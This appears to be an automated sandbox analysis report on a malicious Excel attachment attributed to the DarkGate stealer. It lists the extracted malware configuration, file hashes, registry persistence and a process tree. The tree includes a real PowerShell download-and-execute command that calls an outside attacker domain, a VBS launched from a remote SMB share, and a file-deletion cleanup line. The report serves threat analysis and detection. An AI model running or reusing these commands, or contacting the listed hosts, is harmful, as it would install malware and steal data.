Analysis
-
max time kernel
385s -
max time network
373s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
27-02-2024 15:13
Static task
static1
Behavioral task
behavioral1
Sample
scanned_doc#2024-27-2_4065.xlsx
Resource
win11-20240221-en
General
-
Target
scanned_doc#2024-27-2_4065.xlsx
-
Size
55KB
-
MD5
c8d22d559dacad7baca08452fcc1d577
-
SHA1
bb284b30a3d39019e4da6ec6d0d76a9bd0b879a7
-
SHA256
1a147476f428a3e54505880bb38adb56b8b7dcf8e5d0d0312204396c41b81a1c
-
SHA512
86fcca800930fd2f72d36d00b6695dda43966a2b26a1c86d5aa35a1d9e27927ff266bb5bb09e7fd46b5428fb5054f623f049ed7005b8d82055e5af71c86c4355
-
SSDEEP
1536:p/ToOEjzAw7Y2r7DUsV4XzY9t3jSagJYwehV:BoOAcw7nXDUsOjm3jTxhV
Malware Config
Extracted
darkgate
admin888
remasterprodelherskjs.com
-
anti_analysis
false
-
anti_debug
false
-
anti_vm
false
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
PAuTCBnH
-
minimum_disk
50
-
minimum_ram
7000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 15 IoCs
resource yara_rule behavioral1/memory/4824-70-0x00000000065B0000-0x00000000068FF000-memory.dmp family_darkgate_v6 behavioral1/memory/4672-76-0x0000000002EF0000-0x0000000003692000-memory.dmp family_darkgate_v6 behavioral1/memory/4824-77-0x00000000065B0000-0x00000000068FF000-memory.dmp family_darkgate_v6 behavioral1/memory/4672-81-0x0000000002EF0000-0x0000000003692000-memory.dmp family_darkgate_v6 behavioral1/memory/1484-86-0x0000000002FE0000-0x0000000003782000-memory.dmp family_darkgate_v6 behavioral1/memory/4672-87-0x0000000002EF0000-0x0000000003692000-memory.dmp family_darkgate_v6 behavioral1/memory/4672-88-0x0000000002EF0000-0x0000000003692000-memory.dmp family_darkgate_v6 behavioral1/memory/4672-90-0x0000000002EF0000-0x0000000003692000-memory.dmp family_darkgate_v6 behavioral1/memory/1484-92-0x0000000002FE0000-0x0000000003782000-memory.dmp family_darkgate_v6 behavioral1/memory/4672-93-0x0000000002EF0000-0x0000000003692000-memory.dmp family_darkgate_v6 behavioral1/memory/1484-94-0x0000000002FE0000-0x0000000003782000-memory.dmp family_darkgate_v6 behavioral1/memory/4672-95-0x0000000002EF0000-0x0000000003692000-memory.dmp family_darkgate_v6 behavioral1/memory/4672-96-0x0000000002EF0000-0x0000000003692000-memory.dmp family_darkgate_v6 behavioral1/memory/1484-97-0x0000000002FE0000-0x0000000003782000-memory.dmp family_darkgate_v6 behavioral1/memory/4672-98-0x0000000002EF0000-0x0000000003692000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4484 3140 WScript.exe 76 -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 4824 created 632 4824 AutoIt3.exe 3 PID 4672 created 3708 4672 GoogleUpdateCore.exe 42 PID 4672 created 3532 4672 GoogleUpdateCore.exe 30 PID 4672 created 3804 4672 GoogleUpdateCore.exe 23 -
Blocklisted process makes network request 4 IoCs
flow pid Process 15 964 powershell.exe 16 964 powershell.exe 17 964 powershell.exe 18 964 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4824 AutoIt3.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-160263616-143223877-1356318919-1000\Software\Microsoft\Windows\CurrentVersion\Run\aKGdAff = "C:\\ProgramData\\cahbedg\\Autoit3.exe C:\\ProgramData\\cahbedg\\fbfacef.a3x" GoogleUpdateCore.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoIt3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GoogleUpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GoogleUpdateCore.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GoogleUpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GoogleUpdateCore.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoIt3.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3988 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3140 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 964 powershell.exe 964 powershell.exe 964 powershell.exe 4824 AutoIt3.exe 4824 AutoIt3.exe 4824 AutoIt3.exe 4824 AutoIt3.exe 4672 GoogleUpdateCore.exe 4672 GoogleUpdateCore.exe 4672 GoogleUpdateCore.exe 4672 GoogleUpdateCore.exe 4672 GoogleUpdateCore.exe 4672 GoogleUpdateCore.exe 4672 GoogleUpdateCore.exe 4672 GoogleUpdateCore.exe 1484 GoogleUpdateCore.exe 1484 GoogleUpdateCore.exe 4672 GoogleUpdateCore.exe 4672 GoogleUpdateCore.exe 4672 GoogleUpdateCore.exe 4672 GoogleUpdateCore.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4672 GoogleUpdateCore.exe 1484 GoogleUpdateCore.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 964 powershell.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3140 wrote to memory of 4484 3140 EXCEL.EXE 79 PID 3140 wrote to memory of 4484 3140 EXCEL.EXE 79 PID 4484 wrote to memory of 964 4484 WScript.exe 80 PID 4484 wrote to memory of 964 4484 WScript.exe 80 PID 964 wrote to memory of 4824 964 powershell.exe 82 PID 964 wrote to memory of 4824 964 powershell.exe 82 PID 964 wrote to memory of 4824 964 powershell.exe 82 PID 4824 wrote to memory of 4672 4824 AutoIt3.exe 83 PID 4824 wrote to memory of 4672 4824 AutoIt3.exe 83 PID 4824 wrote to memory of 4672 4824 AutoIt3.exe 83 PID 4824 wrote to memory of 4672 4824 AutoIt3.exe 83 PID 4672 wrote to memory of 1484 4672 GoogleUpdateCore.exe 84 PID 4672 wrote to memory of 1484 4672 GoogleUpdateCore.exe 84 PID 4672 wrote to memory of 1484 4672 GoogleUpdateCore.exe 84 PID 4672 wrote to memory of 1484 4672 GoogleUpdateCore.exe 84 PID 4672 wrote to memory of 4956 4672 GoogleUpdateCore.exe 86 PID 4672 wrote to memory of 4956 4672 GoogleUpdateCore.exe 86 PID 4672 wrote to memory of 4956 4672 GoogleUpdateCore.exe 86
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4672 -
\??\c:\windows\SysWOW64\cmd.exe"c:\windows\system32\cmd.exe" /c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s C:\ProgramData\cahbedg\ & rmdir /s /q C:\ProgramData\cahbedg\3⤵PID:4956
-
\??\c:\windows\SysWOW64\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
PID:3988
-
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3804
-
C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"2⤵
- Adds Run key to start application
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:1484
-
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3532
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵PID:3708
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scanned_doc#2024-27-2_4065.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\yellow.vbs"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'remasterprodelherskjs.com/wzglcrnu')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:964 -
C:\temp\AutoIt3.exe"C:\temp\AutoIt3.exe" script.a3x4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4824
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55a77c2e2f71328f681c69a28f25c90e2
SHA167f5c499e6cef8454125a9cfabc960f497ca7b1a
SHA25620f6d702eecea3b1d2dbc9bd4fbc4d2919ccd01ef6e27f2e54319383909199bb
SHA51221b59e0f4b48fa38a94c2dacce0c607cebef62e8faed5ac71f99bc1bc494bdbf7f0375c74b95f38945d672c4f3747973d9f71b669a83ed8a253602e539f30eaa
-
Filesize
479KB
MD58dfa9e2612156d66505c2992bbc545b2
SHA136d46eb2a4ce57aec9d48a400ea184d10b272a87
SHA256ce6c96f1d2f17e682975219f7bda6933f9a954199f35bab8bbee8a4fc1b392ca
SHA51269b75c5396cb9d5c7d76ca63b65bd4381849203aaab23645209427df4484e0ab5218c6b0ded977a5c14cfe89db4f8fb76f51b7ba7f1e20c6cf6742dfec1d3b28
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32B
MD5810139ec7a9c791f4bfd15ebe236bfb1
SHA13fc2caa7e2bd75d585a7072a937b902a0aa1325b
SHA25629c1b5eb5a0e339a5fa080bd65899a44c47a3a83279135f5dcdb9b6b9111adea
SHA512713661edbf22a7b92b9e6cdd6c66d41f6f9cc065032b0075d41c3eed567a60e6266fa364e3faea85c9b2fc582f09c2412146db3357eed9dc864b637587a3d7e1
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
512KB
MD55c3b17ef0a8665eadcc9e78656080b51
SHA1a97011b64212a761c02fc1dc53598310b23d9e1d
SHA256e008ee57854b1a5b2cf470d68cd6a79bd8125019d5ab5788e4698c9c674bff5b
SHA5125c4fb648dc730da43aca9f08f5d453e5ff991f748c375480637de12aecde85e7d9bd8ff90bc5fcd964b72a808a24efee0ae096879a49eda89bd2f7b59d600152
-
Filesize
4B
MD5db95593b66882f4d24ec1f1381df691e
SHA1f25fe65533cc1105a9866c5b03aa0938e24ae8cf
SHA256f6054abd8fae8c159f366e8856cf4e7593d99288249e342cb0cd9dbfac953cf0
SHA5127424d228144037c5f7505278aefbc4f0ccb53c57f1a854c932aab59ab3781da84c05d6a089c4f2aed9fc2627f909e95396f80f73c8f7c405b8fac0d17ab0c973
-
Filesize
4B
MD525dea593d079be2971f19ba8f0a366ff
SHA10d1b5b0fd9c65d842cf97c7d8940858cc5b5ad0b
SHA2561a0c7111c13c248e3a5b28cf8659cee3ac207dd5070412a6a764aaa6b7ddd875
SHA512240fd4848b97a76f5638b8277883fc6f67f9f9ef42185ca6cf600aa108f1df9303bfcc928e7c263aec6e115a99e3f5893688c1c56fd09a156b828cf51f833841
-
Filesize
4B
MD5260578deb0f431be2ed7a532068ed914
SHA197c4913c51e901a5f36db8a2d14892cdbc93527e
SHA256e215ccb0fc8783894cf305b77770a137220c103a689159ebefc341041d710475
SHA5121df04f760f8e1134b6a1bf7f106a1210ab5eb3eb0fad558e6a2c28dda95ec4dd85967eceead137ff32bc6b43402fb5fca04bc7d8253e4d8a34e67d81c7f0e51c
-
Filesize
469KB
MD5fed1cada5e6082bc1393036555d061b9
SHA137b1a821af0e64104c9ffcb8fa39ab4d78c7374d
SHA2562c8ddb6ee845e48c776da5e06cbaf4529b5909384e4786f533d6dd3b679d295c
SHA5126d0fa057c3a1a9aaf39a6fe596d5a12a5f5689dc48811c2e09c001e63f9712e9103d2d21c6afb1d4321823bf6c78263818695e3c8f821f39ad2f4d89404bf630
-
Filesize
76B
MD584daf31ae22d4a6a40b0fffda6ea2995
SHA17912e09030e200187682f5253068b27fd824faf2
SHA256c490210dba7ecd1a4987d4dab36d3f6d5a0a1a7eaf47f1e3cf0f93dd4244e65d
SHA51269210ed3bb6ee8aa0e7a8a5d148774aaae4e58390736354f5ac1ed5919714778234a3d79358dc6299bdcd12a754adbdadee17b4349061107981d865b84245f46